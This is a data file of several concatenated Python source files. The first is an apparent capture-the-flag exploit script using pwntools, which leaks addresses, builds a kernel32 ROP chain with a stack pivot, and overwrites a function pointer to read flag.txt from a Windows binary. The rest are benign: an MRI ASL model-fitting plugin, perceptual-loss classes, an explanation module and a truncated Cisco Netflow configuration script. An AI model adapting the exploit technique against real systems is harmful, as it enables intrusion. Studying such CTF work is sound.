text stringlengths 957 885k |
|---|
#!/usr/bin/env python
# Author: b0yd
# Ex: AppJailLauncher.exe /outbound /key:flag.txt /port:4444 ConsoleApplication2.exe
from pwn import *
import sys
import binascii
#####
##Uncomment the following code to use BugId as the test harness while trying to catch crashes
#
#sBaseFolderPath = "C:\Users\user\Documents\GitHub\BugId"
#for sPath in [sBaseFolderPath] + [os.path.join(sBaseFolderPath, x) for x in ["modules"]]:
# if sPath not in sys.path:
# sys.path.insert(0, sPath);
#import BugId
#def bugIdFunc(pid_arg):
# BugId.fuMain(['--pids='+str(pid)])
def eip( input ):
buf = '0\n'
buf += "C" * 0xe
buf += input + ("\x00")
buf += "\xff" * ( 0x400 - len(buf))
r.send(buf)
def make(dep, arr, time):
r.sendline('1')
r.recvuntil(': ')
r.sendline(str(dep))
r.recvuntil(': ')
r.sendline(str(arr))
data = r.recv()
if "Arrival" in data:
r.sendline(str(time))
r.recvuntil('?\n')
def sale(pl, name, cash):
r.sendline('2')
r.recvuntil(': ')
r.sendline(str(pl))
r.recvuntil(': ')
r.sendline(name)
r.recvuntil(': ')
r.sendline(str(cash))
r.recvuntil('?\n')
def land(pl):
r.sendline('3')
r.recvuntil('? ')
buf = cyclic( 0x400 )
r.send(buf)
r.recvuntil('?\n')
def airport_info_leak():
r.sendline('4')
return r.recvuntil('?\n')
def plane_info_leak(pl):
r.sendline('5')
r.recvuntil('Which Plane: ')
r.sendline(str(pl))
r.recvuntil('From: ')
return r.recvuntil('?\n')
def exploit(r):
r.recvuntil('?\n')
#Get memory leak from menu 4
data = airport_info_leak().split()
money = ( int(data[8]) - 0xC340C483489448) ^ 0xFFFFFF
bin_addr = int(data[11]) ^ 0xFFFFFF #Have to xor
leak_offset = (0x7FF70C714AF0 - 0x7FF70C700000)
read_buf_off = (0x7FF70C714688 - 0x7FF70C700000)
import_tbl_off = (0x7FF70C712000 - 0x7FF70C700000)
base_addr = bin_addr - leak_offset
log.info("App Base Address: " + hex(base_addr))
#Make the first plane
make(5, 4, 5555555555)
#struct_null_ptr_bug_ptr_data struc ; (sizeof=0x202C, align=0x4, mappedto_36)
#00000000 customer_count dd ?
#00000004 gap4 dd ?
#00000008 ticket_arr db 4096 dup(?) ; ticket sale array
#00001008 num_of_planes dq ?
#00001010 plane_array db 4096 dup(?)
#00002010 money_earned? dq ?
#00002018 overwritable_func_ptr dq ? ; called when 0 menu is called
#00002020 gap2020 db 8 dup(?)
#00002028 func_ptr_arg dd ?
#0000202C struct_null_ptr_bug_ptr_data ends
#Get gadgets from the application
pe = PE(bin_path)
rop = ROP(pe, load_all=True)
#Get stack pivot from main binary
#This gadget was strategically place because nothing usable exists in kernel32 or mscvrt
gadget_iter = rop.search_iter( regs=["rsp", "rax"], ops=["xchg"] )
gadget_list = list(gadget_iter)
gadget = gadget_list[1]
pivot_off = gadget.address & 0xffffffff
log.info("Pivot offset: " + hex(pivot_off) )
cust = 0x402
for j in range(cust, cust * 2):
buf = ''
buf += "B" * 0x200
sale(0, buf, j)
#Get gadgets from the application
pe = PE("C:\\Divided\\kernel32.dll")
rop = ROP(pe, load_all=True)
#Resolve VirtualAlloc address
virtual_alloc_off = rop.resolve("VirtualAlloc")
k32_base = money - virtual_alloc_off
log.info("Kernel32 Base: " + hex(k32_base))
#Get gadget to align stack for file open
#https://social.msdn.microsoft.com/Forums/en-US/306ba651-59d4-4dba-934b-3be247b12d4e/movaps-gp-in-createfilea-after-upgrading-to-win10?forum=windowscompatibility
align_gadj = None
for piv,addr in rop.pivots.iteritems():
if piv == 10:
align_gadj = addr & 0xffffffff #Need to add 4
break
if align_gadj == None:
log.info("Couldn't find gadget to align the stack")
sys.exit(1)
align_rop = align_gadj + k32_base
buf = p64(align_rop)
#Get pop rax gadget
rax_gadg = None
gadget_iter = rop.search_iter( regs=["rax"], ops=["pop"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if len(gadget.insns) == 2 and gadget.move == 8:
rax_gadg = gadget
break
if rax_gadg == None:
log.info("Couldn't find gadget for pop rax")
sys.exit(1)
rax_off = rax_gadg.address & 0xffffffff
rax_rop = rax_off + k32_base
buf += p64(rax_rop)
buf += "C" * 6 #Garbage for stack alignment
ret_addr = rax_rop + 1
buf += p64(ret_addr)
buf += p64(ret_addr) #Align 8 extra bytes
#Get arg1 pop
rcx_gadg = None
gadget_iter = rop.search_iter( regs=["rcx"], ops=["pop", "jmp"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if len(gadget.insns) == 2 and gadget.move == 4:
rcx_gadg = gadget
break
if rcx_gadg == None:
log.info("Couldn't find gadget for pop rcx")
sys.exit(1)
rcx_off = (rcx_gadg.address)& 0xffffffff
rcx_rop = rcx_off + k32_base
buf += p64(rcx_rop)
buf += p64(read_buf_off + base_addr + 0x10 ) #Ptr to file name
#Get pop rdx gadget
rdx_gadg = None
gadget_iter = rop.search_iter( regs=["rdx"], ops=["pop"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if len(gadget.insns) == 2:
rdx_gadg = gadget
break
if rdx_gadg == None:
log.info("Couldn't find gadget for pop rdx")
sys.exit(1)
rdx_off = rdx_gadg.address & 0xffffffff
rdx_rop = rdx_off + k32_base
buf += p64(rdx_rop)
buf += p64(0) #Read flag for file open
#Add file open call
lopen_off = rop.resolve('_lopen')
buf += p64(lopen_off + k32_base)
#Skip over garbage
buf += p64(rdx_rop)
buf += "C" * 8 #Garbage that gets overwritten
rax_gadg = None
gadget_iter = rop.search_iter( dst_regs=['ecx'], src_regs=['eax', 'r9d'], ops=['mov'] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if gadget.move == 0x2c:
rax_gadg = gadget
break
if rax_gadg == None:
log.info("Couldn't find gadget for pop rax")
sys.exit(1)
#Move file handle to rcx for next call
rax_off = rax_gadg.address & 0xffffffff
rax_rop = rax_off + k32_base
buf += p64(rax_rop)
buf += "D" * 0x28 #Garbage
buf += p64(rdx_rop)
buf += p64(read_buf_off + base_addr + 0x30) #Ptr to data section buf
#Get pop rbx gadget
rbx_gadg = None
gadget_iter = rop.search_iter( dst_regs=["rbx"], ops=["pop"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if len(gadget.insns) == 2 and gadget.move == 8:
rbx_gadg = gadget
break
if rbx_gadg == None:
log.info("Couldn't find gadget for pop rbx")
sys.exit(1)
rbx_off = rbx_gadg.address & 0xffffffff
rbx_rop = rbx_off + k32_base
buf += p64(rbx_rop)
buf += p64(ret_addr )
#Get gadget to clear r8
r8b_gadg = None
gadget_iter = rop.search_iter( dst_regs=["r8d", "rbx"], ops=["xor"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if len(gadget.insns) == 0x2:
r8b_gadg = gadget
if r8b_gadg == None:
log.info("Couldn't find gadget for pop r8b")
sys.exit(1)
r8_off = r8b_gadg.address & 0xffffffff
r8_rop = r8_off + k32_base
buf += p64(r8_rop)
buf += "D" * 0x38 #Garbage
#Get pop rax gadget
rax_gadg = None
gadget_iter = rop.search_iter( dst_regs=["rax"], ops=["pop"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if len(gadget.insns) == 2 and gadget.move == 8:
rax_gadg = gadget
break
if rax_gadg == None:
log.info("Couldn't find gadget for pop rax")
sys.exit(1)
rax_off = rax_gadg.address & 0xffffffff
rax_rop = rax_off + k32_base
buf += p64(rax_rop)
buf += p64(read_buf_off + base_addr + 0x20 )
#Get add r8b, rax gadget
r8b_gadg = None
gadget_iter = rop.search_iter( dst_regs=["r8b"], ops=["add"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
r8b_gadg = gadget
break
if r8b_gadg == None:
log.info("Couldn't find gadget for pop r8b")
sys.exit(1)
r8_off = r8b_gadg.address & 0xffffffff
r8_rop = r8_off + k32_base
buf += p64(r8_rop)
buf += "D" * 0x28 #Garbage
#Add read call
lread_off = rop.resolve("_lread")
buf += p64(lread_off + k32_base)
#Skip over garbage
buf += p64(rdx_rop)
buf += 'C' * 8 #Garbage that gets overwritten
#Get pop rsi gadget
rsi_gadg = None
gadget_iter = rop.search_iter( dst_regs=["rsi"], ops=["pop"] )
gadget_list = list(gadget_iter)
for gadget in gadget_list:
if len(gadget.insns) == 2 and gadget.move == 8:
rsi_gadg = gadget
break
if rsi_gadg == None:
log.info("Couldn't find gadget for pop rax")
sys.exit(1)
rsi_off = rsi_gadg.address & 0xffffffff
rsi_rop = rsi_off + k32_base
buf += p64(rsi_rop)
buf += p64(read_buf_off + base_addr + 0x30 ) #Flag buffer
#Write length
buf += p64(rbx_rop)
buf += p64( 100 )
#Write out the flag
write_off = ( 0x0007FF703C2CE70 - 0x0007FF703C20000 ) #Offset to writefile in binary
buf += p64( write_off + base_addr )
#Garbage
buf += "C"* ( 0x200 - len(buf))
sale(0, buf, pivot_off + base_addr)
#Trigger call to function ptr overwrite
buf = 'flag.txt'
eip(buf)
#Drop into interactive
r.interactive()
if __name__ == "__main__":
bin_path = 'C:\\Divided\\ConsoleApplication2.exe'
#r = remote('127.0.0.1', 4444)
r = process([bin_path])
#pid = util.proc.pidof(p)[0]
#t = Thread(target = bugIdFunc, args = ([pid]))
#t.daemon = True
#t.start() #start collecting lines from the stream
#pause()
#Windbg args
#args = []
#args = ["lm"]
#args.append("bp ConsoleApplication2+0xf0b1") # print plane info
#args.append("bp ConsoleApplication2+0xFB86") # func ptr callable
#args.append("g")
#Start the process with windbg attached
#windbg.attach( r, args )
#r = windbg.debug([bin_path], args )
exploit(r)
|
<filename>oxasl_multite/api.py
"""
OXASL plugin for processing multiphase ASL data
Copyright (c) 2019 Univerisity of Oxford
"""
import math
import numpy as np
from fsl.wrappers import LOAD
from fsl.data.image import Image
from oxasl import basil
from oxasl.options import OptionCategory, IgnorableOptionGroup
from oxasl.reporting import Report
from oxasl.wrappers import fabber, mvntool
from ._version import __version__
def _run_fabber(wsp, options, desc):
"""
Run Fabber and write the output to a workspace
"""
wsp.log.write(" - %s " % desc)
result = fabber(options, output=LOAD, progress_log=wsp.log, log=wsp.fsllog)
wsp.log.write(" - DONE\n")
for key, value in result.items():
setattr(wsp, key, value)
if result["logfile"] is not None and wsp.savedir is not None:
wsp.set_item("logfile", result["logfile"], save_fn=str)
return result
def _base_fabber_options(wsp, asldata):
options = {
"method" : "vb",
"noise" : "white",
"model" : "asl_multite",
"data" : asldata,
"mask" : wsp.rois.mask,
"ti" : list(asldata.tis),
"tau" : list(asldata.taus),
"repeats" : asldata.rpts[0], # We have already checked repeats are fixed
"save-mean" : True,
"max-iterations": 30,
}
if wsp.bat is None:
wsp.bat = 1.3 if wsp.casl else 0.7
if wsp.batsd is None:
wsp.batsd = 1.0 if len(asldata.tis) > 1 else 0.1
for opt in ("bat", "batsd", "t1", "t1b"):
val = wsp.ifnone(opt, None)
if val is not None:
options[opt] = val
return options
def _multite_fabber_options(wsp, asldata):
options = _base_fabber_options(wsp, asldata)
options.update({
"model" : "asl_multite",
"te" : list(wsp.asldata.tes),
"infertexch" : True,
"save-std" : True,
"save-model-fit" : True,
"save-residuals" : wsp.ifnone("output_residuals", False),
"max-iterations": 30,
"t2" : float(wsp.ifnone("t2", 50)) / 1000
})
if wsp.spatial:
options.update({
"PSP_byname1" : "ftiss",
"PSP_byname1_type" : "M",
"method" : "spatialvb",
})
# Additional user-specified multiphase fitting options override the above
options.update(wsp.ifnone("multite_options", {}))
return options
def _aslrest_fabber_options(wsp, asldata):
options = _base_fabber_options(wsp, asldata)
options.update({
"model" : "aslrest",
"casl" : True,
"inctiss" : True,
"incbat" : True,
"infertiss" : True,
"inferbat" : True,
"save-std" : True,
})
return options
def init_t2(wsp):
"""
Initialize the T2 value by fitting the T2 decay part of the signal
We do not use Fabber for this (although it would be possible). Instead
we do a simple voxel-by-voxel least squares fit to a T2 decay model using
a subset of voxels with the strongest signals. We take the median of the T2
value as our estimate since the mean can be affected by extreme values resulting
from fitting problems.
"""
def t2model(tes, t2, *s0):
ntes = len(tes)/len(s0)
s0 = np.repeat(np.array(s0), ntes)
return s0 * np.exp(-1000*tes/t2)
wsp.log.write(" - Initializing T2 value by fit to T2 decay model\n")
# Estimate T2 and a T2 corrected signal
wsp.data_multite = wsp.asldata.diff().reorder(out_order="etr")
data_multite = wsp.data_multite.data
volshape = list(data_multite.shape[:3])
# Identify unmasked voxels with strongest signals
diffdata = data_multite.max(axis=-1) - data_multite.min(axis=-1)
thresh = np.percentile(diffdata, wsp.ifnone("multite_t2_init_percentile", 95))
wsp.log.write(" - Including unmasked voxels with signal > %f\n" % thresh)
mask_thresh = diffdata > thresh
roidata = np.logical_and(wsp.rois.mask.data > 0, diffdata > thresh)
data_multite_roi = data_multite[roidata]
nvoxels_roi = data_multite_roi.shape[0]
nvols = wsp.asldata.nvols
ntes = wsp.asldata.ntes
nsigs = int(nvols / ntes)
tes = np.array(wsp.asldata.tes * nsigs)
wsp.log.write(" - %i TEs, %i volumes, %i signals, %i voxels\n" % (ntes, nvols, nsigs, nvoxels_roi))
# Go through each voxel and fit the T2 decay model for S0 and T2
t2_roi = np.zeros((nvoxels_roi, ), dtype=np.float32)
sig_roi = np.zeros((nvoxels_roi, nsigs), dtype=np.float32)
for voxel_idx, data_multite_voxel in enumerate(data_multite_roi):
try:
# Initialize signal from maximum of the data at each time point
sig_init = [max(data_multite_voxel[sig_idx*ntes:(sig_idx+1)*ntes]) for sig_idx in range(nsigs)]
param_init=[wsp.t2, ] + sig_init
from scipy.optimize import curve_fit
popt, pcov = curve_fit(t2model, tes, data_multite_voxel, p0=param_init)
t2_roi[voxel_idx] = popt[0]
sig_roi[voxel_idx, :] = popt[1:]
except Exception as exc:
wsp.log.write(" - WARNING: fit failed for voxel: %i\n" % voxel_idx)
wsp.t2 = np.median(t2_roi)
wsp.log.write(" - Median T2: %f ms\n" % wsp.t2)
def fit_init(wsp):
"""
Do an initial fit on ftiss and delttiss using the aslrest model
The first stage of this is to apply a T2 correction to the multi-TE data
and take the mean across TEs, since the ASLREST model contains no T2
correction.
The resulting ASL data is put through the basic ASLREST model. We then run a single
iteration of the multi-TE model to generate an MVN, and insert the ftiss and delttiss
output from ASLREST into the MVN. This is then used to initialize the multi-TE run.
"""
wsp.log.write(" - Preparing initialization of perfusion from resting state model\n")
wsp.data_multite = wsp.asldata.diff().reorder(out_order="etr")
data_multite = wsp.data_multite.data
tes = wsp.asldata.tes
nvols_mean = int(wsp.asldata.nvols/len(tes))
# Do the T2 correction and take the mean across TEs
data_mean = np.zeros(list(data_multite.shape[:3]) + [nvols_mean])
for idx, te in enumerate(tes):
t2_corr_factor = math.exp(1000 * te / wsp.t2)
wsp.log.write(" - Using T2 correction factor for TE=%f: %f\n" % (te, t2_corr_factor))
data_mean += data_multite[..., idx::wsp.asldata.ntes] * t2_corr_factor
wsp.asldata_mean = wsp.asldata.derived(image=data_mean/len(tes), name="asldata",
iaf="diff", order="tr", tes=[0])
# Run ASLREST on the mean data to generate initial estimates for CBF and ATT
options = _aslrest_fabber_options(wsp, wsp.asldata_mean)
result = _run_fabber(wsp.sub("aslrest"), options, "Running Fabber using standard ASL model for CBF/ATT initialization")
wsp.aslrest.var_ftiss = Image(np.square(wsp.aslrest.std_ftiss.data), header=wsp.aslrest.std_ftiss.header)
wsp.aslrest.var_delttiss = Image(np.square(wsp.aslrest.std_delttiss.data), header=wsp.aslrest.std_delttiss.header)
# Run the multi-TE model for 1 iteration to get an MVN in the correct format
options = _multite_fabber_options(wsp, wsp.asldata)
options.update({"save-mvn" : True, "max-iterations" : 1})
result = _run_fabber(wsp.sub("mvncreate"), options, "Running Fabber for 1 iteration on multi-TE model to generate initialization MVN")
# Merge the CBF and ATT estimates from the ASLREST run into the output MVN to generate an initialization MVN
# for the final multi-TE fit.
wsp.log.write(" - Merging CBF and ATT estimates into the MVN to initialize multi-TE fit\n")
wsp.init_mvn = mvntool(wsp.mvncreate.finalMVN, 1, output=LOAD, mask=wsp.rois.mask, write=True, valim=wsp.aslrest.mean_ftiss, varim=wsp.aslrest.var_ftiss, log=wsp.fsllog)["output"]
wsp.init_mvn = mvntool(wsp.init_mvn, 2, output=LOAD, mask=wsp.rois.mask, write=True, valim=wsp.aslrest.mean_delttiss, varim=wsp.aslrest.var_delttiss, log=wsp.fsllog)["output"]
def fit_multite(wsp):
"""
Run model fitting on multi-TE data
"""
wsp.log.write("\nPerforming multi-TE model fitting:\n")
if wsp.asldata.is_var_repeats():
raise ValueError("Multi-TE ASL data with variable repeats not currently supported")
# Make sure repeats are the slowest varying as this is what the model expects. Similarly
# make sure varying TEs are always within each TI
wsp.asldata = wsp.asldata.diff().reorder(out_order="etr")
options = _multite_fabber_options(wsp, wsp.asldata)
if wsp.multite_init_t2:
wsp.sub("init_t2")
init_t2(wsp.init_t2)
wsp.t2 = wsp.init_t2.t2
if wsp.multite_init:
wsp.sub("init")
fit_init(wsp.init)
options["continue-from-mvn"] = wsp.init.init_mvn
result = _run_fabber(wsp.multite.sub("finalstep"), options, "Running Fabber using multi-TE model")
wsp.log.write("\nDONE multi-TE model fitting\n")
def model_multite(wsp):
"""
Do modelling on multi-TE ASL data
:param wsp: Workspace object
Required workspace attributes
-----------------------------
- ``asldata`` - ASLImage containing multi-TE data
Optional workspace attributes
-----------------------------
See ``MultiTEOptions`` for other options
Workspace attributes updated
----------------------------
- ``multite`` - Sub-workspace containing multi-TE decoding output
- ``output`` - Sub workspace containing native/structural/standard space
parameter maps
"""
wsp.sub("multite")
fit_multite(wsp.multite)
# Write output
wsp.sub("output")
from oxasl import oxford_asl
oxford_asl.output_native(wsp.output, wsp.multite)
# Re-do registration using PWI map.
oxford_asl.redo_reg(wsp, wsp.output.native.perfusion)
# Write output in transformed spaces
oxford_asl.output_trans(wsp.output)
wsp.log.write("\nDONE processing\n")
class MultiTEOptions(OptionCategory):
"""
OptionCategory which contains options for preprocessing multi-TE ASL data
"""
def __init__(self, **kwargs):
OptionCategory.__init__(self, "oxasl_multite", **kwargs)
def groups(self, parser):
groups = []
group = IgnorableOptionGroup(parser, "Multi-TE Options", ignore=self.ignore)
group.add_option("--multite-init-t2", help="Initialize T2 value", action="store_true", default=False)
group.add_option("--multite-init", help="Initialize perfusion and transit time using fit on restring state ASL model", action="store_true", default=False)
group.add_option("--multite-options", help="File containing additional options for multiphase fitting step", type="optfile")
groups.append(group)
return groups
|
"""
Code borrowed from https://gist.github.com/alper111/8233cdb0414b4cb5853f2f730ab95a49#file-vgg_perceptual_loss-py-L5
"""
import torch
import torchvision
from models.vggface import VGGFaceFeats
def cos_loss(fi, ft):
return 1 - torch.nn.functional.cosine_similarity(fi, ft).mean()
class VGGPerceptualLoss(torch.nn.Module):
def __init__(self, resize=False):
super(VGGPerceptualLoss, self).__init__()
blocks = []
blocks.append(torchvision.models.vgg16(pretrained=True).features[:4].eval())
blocks.append(torchvision.models.vgg16(pretrained=True).features[4:9].eval())
blocks.append(torchvision.models.vgg16(pretrained=True).features[9:16].eval())
blocks.append(torchvision.models.vgg16(pretrained=True).features[16:23].eval())
for bl in blocks:
for p in bl:
p.requires_grad = False
self.blocks = torch.nn.ModuleList(blocks)
self.transform = torch.nn.functional.interpolate
self.mean = torch.nn.Parameter(torch.tensor([0.485, 0.456, 0.406]).view(1,3,1,1))
self.std = torch.nn.Parameter(torch.tensor([0.229, 0.224, 0.225]).view(1,3,1,1))
self.resize = resize
def forward(self, input, target, max_layer=4, cos_dist: bool = False):
target = (target + 1) * 0.5
input = (input + 1) * 0.5
if input.shape[1] != 3:
input = input.repeat(1, 3, 1, 1)
target = target.repeat(1, 3, 1, 1)
input = (input-self.mean) / self.std
target = (target-self.mean) / self.std
if self.resize:
input = self.transform(input, mode='bilinear', size=(224, 224), align_corners=False)
target = self.transform(target, mode='bilinear', size=(224, 224), align_corners=False)
x = input
y = target
loss = 0.0
loss_func = cos_loss if cos_dist else torch.nn.functional.l1_loss
for bi, block in enumerate(self.blocks[:max_layer]):
x = block(x)
y = block(y)
loss += loss_func(x, y.detach())
return loss
class VGGFacePerceptualLoss(torch.nn.Module):
def __init__(self, weight_path: str = "checkpoint/vgg_face_dag.pt", resize: bool = False):
super().__init__()
self.vgg = VGGFaceFeats()
self.vgg.load_state_dict(torch.load(weight_path))
mean = torch.tensor(self.vgg.meta["mean"]).view(1, 3, 1, 1) / 255.0
self.register_buffer("mean", mean)
self.transform = torch.nn.functional.interpolate
self.resize = resize
def forward(self, input, target, max_layer: int = 4, cos_dist: bool = False):
target = (target + 1) * 0.5
input = (input + 1) * 0.5
# preprocessing
if input.shape[1] != 3:
input = input.repeat(1, 3, 1, 1)
target = target.repeat(1, 3, 1, 1)
input = input - self.mean
target = target - self.mean
if self.resize:
input = self.transform(input, mode='bilinear', size=(224, 224), align_corners=False)
target = self.transform(target, mode='bilinear', size=(224, 224), align_corners=False)
input_feats = self.vgg(input)
target_feats = self.vgg(target)
loss_func = cos_loss if cos_dist else torch.nn.functional.l1_loss
# calc perceptual loss
loss = 0.0
for fi, ft in zip(input_feats[:max_layer], target_feats[:max_layer]):
loss = loss + loss_func(fi, ft.detach())
return loss
class PerceptualLoss(torch.nn.Module):
def __init__(
self, lambda_vggface: float = 0.025 / 0.15, lambda_vgg: float = 1, eps: float = 1e-8, cos_dist: bool = False
):
super().__init__()
self.register_buffer("lambda_vggface", torch.tensor(lambda_vggface))
self.register_buffer("lambda_vgg", torch.tensor(lambda_vgg))
self.cos_dist = cos_dist
if lambda_vgg > eps:
self.vgg = VGGPerceptualLoss()
if lambda_vggface > eps:
self.vggface = VGGFacePerceptualLoss()
def forward(self, input, target, eps=1e-8, use_vggface: bool = True, use_vgg=True, max_vgg_layer=4):
loss = 0.0
if self.lambda_vgg > eps and use_vgg:
loss = loss + self.lambda_vgg * self.vgg(input, target, max_layer=max_vgg_layer)
if self.lambda_vggface > eps and use_vggface:
loss = loss + self.lambda_vggface * self.vggface(input, target, cos_dist=self.cos_dist)
return loss
|
<gh_stars>0
from .soc_algo import _SamplingAndOcclusionAlgo
from .lm import BiGRULanguageModel
from .train_lm import do_train_lm
import os, logging, torch, pickle
import json
logger = logging.getLogger(__name__)
class SamplingAndOcclusionExplain:
def __init__(self, model, configs, tokenizer, output_path, device, lm_dir=None, train_dataloader=None,
dev_dataloader=None, vocab=None):
self.configs = configs
self.model = model
self.lm_dir = lm_dir
self.train_dataloader = train_dataloader
self.dev_dataloader = dev_dataloader
self.vocab = vocab
self.output_path = output_path
self.device = device
self.hiex = configs.hiex
self.tokenizer = tokenizer
self.lm_model = self.detect_and_load_lm_model()
self.algo = _SamplingAndOcclusionAlgo(model, tokenizer, self.lm_model, output_path, configs)
self.use_padding_variant = configs.use_padding_variant
try:
self.output_file = open(self.output_path, 'w' if not configs.hiex else 'wb')
except FileNotFoundError:
self.output_file = None
self.output_buffer = []
# for explanation regularization
self.neutral_words_file = configs.neutral_words_file
self.neutral_words_ids = None
self.neutral_words = None
#self.debug = debug
def detect_and_load_lm_model(self):
if not self.lm_dir:
self.lm_dir = 'runs/lm/'
if not os.path.isdir(self.lm_dir):
os.mkdir(self.lm_dir)
file_name = None
for x in os.listdir(self.lm_dir):
if x.startswith('best'):
file_name = x
break
if not file_name:
self.train_lm()
for x in os.listdir(self.lm_dir):
if x.startswith('best'):
file_name = x
break
lm_model = torch.load(open(os.path.join(self.lm_dir, file_name), 'rb'))
return lm_model
def train_lm(self):
logger.info('Missing pretrained LM. Now training')
model = BiGRULanguageModel(self.configs, vocab=self.vocab, device=self.device).to(self.device)
do_train_lm(model, lm_dir=self.lm_dir, lm_epochs=5,
train_iter=self.train_dataloader, dev_iter=self.dev_dataloader)
def word_level_explanation_bert(self, input_ids, input_mask, segment_ids, label=None):
# requires batch size is 1
# get sequence length
i = 0
while i < input_ids.size(1) and input_ids[0,i] != 0: # pad
i += 1
inp_length = i
# do not explain [CLS] and [SEP]
spans, scores = [], []
for i in range(1, inp_length-1, 1):
span = (i, i)
spans.append(span)
if not self.use_padding_variant:
score = self.algo.do_attribution(input_ids, input_mask, segment_ids, span, label)
else:
score = self.algo.do_attribution_pad_variant(input_ids, input_mask, segment_ids, span, label)
scores.append(score)
inp = input_ids.view(-1).cpu().numpy()
s = self.algo.repr_result_region(inp, spans, scores)
self.output_file.write(s + '\n')
def hierarchical_explanation_bert(self, input_ids, input_mask, segment_ids, label=None):
tab_info = self.algo.do_hierarchical_explanation(input_ids, input_mask, segment_ids, label)
self.output_buffer.append(tab_info)
# currently store a pkl after explaining each instance
self.output_file = open(self.output_path, 'w' if not self.hiex else 'wb')
print("Saving >> {} -> {}".format(self.output_buffer, self.output_file))
pickle.dump(self.output_buffer, self.output_file)
self.output_file.close()
def _initialize_neutral_words(self):
f = open(self.neutral_words_file)
neutral_words = []
neutral_words_ids = set()
for line in f.readlines():
word = line.strip().split('\t')[0]
canonical = self.tokenizer.tokenize(word)
if len(canonical) > 1:
canonical.sort(key=lambda x: -len(x))
print(canonical)
word = canonical[0]
neutral_words.append(word)
neutral_words_ids.add(self.tokenizer.vocab[word])
self.neutral_words = neutral_words
self.neutral_words_ids = neutral_words_ids
assert neutral_words
def compute_explanation_loss(self, input_ids_batch, input_mask_batch, segment_ids_batch, label_ids_batch,
do_backprop=False):
if self.neutral_words is None:
self._initialize_neutral_words()
batch_size = input_ids_batch.size(0)
neutral_word_scores, cnt = [], 0
for b in range(batch_size):
input_ids, input_mask, segment_ids, label_ids = input_ids_batch[b], \
input_mask_batch[b], \
segment_ids_batch[b], \
label_ids_batch[b]
nw_positions = []
for i in range(len(input_ids)):
word_id = input_ids[i].item()
if word_id in self.neutral_words_ids:
nw_positions.append(i)
# only generate explanations for neutral words
for i in range(len(input_ids)):
word_id = input_ids[i].item()
if word_id in self.neutral_words_ids:
x_region = (i, i)
#score = self.algo.occlude_input_with_masks_and_run(input_ids, input_mask, segment_ids,
# [x_region], nb_region, label_ids,
# return_variable=True)
if not self.configs.use_padding_variant:
score = self.algo.do_attribution(input_ids, input_mask, segment_ids, x_region, label_ids,
return_variable=True, additional_mask=nw_positions)
else:
score = self.algo.do_attribution_pad_variant(input_ids, input_mask, segment_ids,
x_region, label_ids, return_variable=True,
additional_mask=nw_positions)
score = self.configs.reg_strength * (score ** 2)
if do_backprop:
score.backward()
neutral_word_scores.append(score.item())
if neutral_word_scores:
return sum(neutral_word_scores), len(neutral_word_scores)
else:
return 0., 0
|
#!/usr/bin/env python3
#
# Copyright (c) 2018, Cisco and/or its affiliates
# All rights reserved.
#__maintainer__ = '<NAME>'
#__email__ = '<EMAIL>'
#__date__ = 'January 2019'
#__version__ = 1.0
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# This script enable Netflow configuration for Encrypted Traffic Analytics Catalyst 9K.
# Limitations:
# 1. The script use the predefine names for NetFlow record (fnf-eta-rec), exporter (fnf-eta-exp)
# and monitor (fnf-eta-mon) unless they are specified from the CLI
# 2. Refer to the ETA Cisco Validated Design on cisco.com for eanble ETA on interfaces for differnet deployments
import sys
from argparse import ArgumentParser
from ncclient import manager
import xml.dom.minidom
import re
import logging
import checkversion
from xml.etree.ElementTree import XML
def configure_flow_record(netconf_handler, proc_recordname, proc_exportername, proc_exporter_ip, proc_exporter_port, proc_monitorname):
'''
This procedure configure Netflow record for ETA
'''
flow_record_payload = '''
<config>
<native xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-native">
<flow>
<record xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-flow">
<name>{eta_record}</name>
<description>For ETA</description>\
<collect>
<counter>
<bytes>
<long/>
</bytes>
<packets>
<long/>
</packets>
</counter>
<timestamp>
<absolute>
<first/>
<last/>
</absolute>
</timestamp>
</collect>
<match>
<ipv4>
<destination>
<address/>
</destination>
<protocol/>
<source>
<address/>
</source>
</ipv4>
<transport>
<destination-port/>
<source-port/>
</transport>
</match>
</record>
<exporter xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-flow">\
<name>{eta_exporter}</name>\
<description>For ETA</description>\
<destination>\
<ipdest>\
<ip>{eta_exporter_ip}</ip>\
</ipdest>\
</destination>\
<transport>\
<udp>{eta_exporter_port}</udp>\
</transport>\
</exporter>\
<monitor xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-flow">\
<name>{eta_monitor}</name>\
<description>For ETA</description>\
<cache>\
<timeout>\
<active>60</active>\
</timeout>\
</cache>\
<exporter>\
<name>{eta_exporter}</name>\
</exporter>\
<record>\
<type>{eta_record}</type>\
</record>\
